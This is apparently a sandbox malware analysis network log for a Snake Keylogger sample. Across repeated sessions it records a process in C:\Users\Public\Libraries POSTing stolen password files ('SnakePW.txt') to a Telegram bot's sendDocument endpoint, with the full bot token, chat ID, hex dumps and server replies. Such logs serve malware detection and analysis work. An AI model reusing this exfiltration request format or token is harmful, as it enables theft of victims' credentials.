                                                                                                                2024-11-26 07:26:11 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388959,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                62192.168.2.749935149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:10 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f6f3c5dd29e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:10 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 36 66 33 63 35 64 64 32 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f6f3c5dd29eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:11 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:11 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388961,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                63192.168.2.749936149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:10 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10047244b21a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:10 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 34 37 32 34 34 62 32 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10047244b21aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:11 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:11 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388962,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                64192.168.2.749941149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:12 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f76f31b176f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:12 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 37 36 66 33 31 62 31 37 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f76f31b176fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:13 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:13 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388965,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                65192.168.2.749942149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:12 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f82c2b37b8e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:12 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 38 32 63 32 62 33 37 62 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f82c2b37b8eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:13 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:13 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388967,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                66192.168.2.749943149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:12 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd101cbc07fa5f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:12 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 31 63 62 63 30 37 66 61 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd101cbc07fa5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:13 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:13 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388969,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                67192.168.2.749948149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:14 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f8fc54b4863
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:14 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 38 66 63 35 34 62 34 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f8fc54b4863Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:15 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:15 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 37 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388971,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                68192.168.2.749949149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:14 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f9b66364c74
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:14 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 39 62 36 36 33 36 34 63 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f9b66364c74Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:15 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
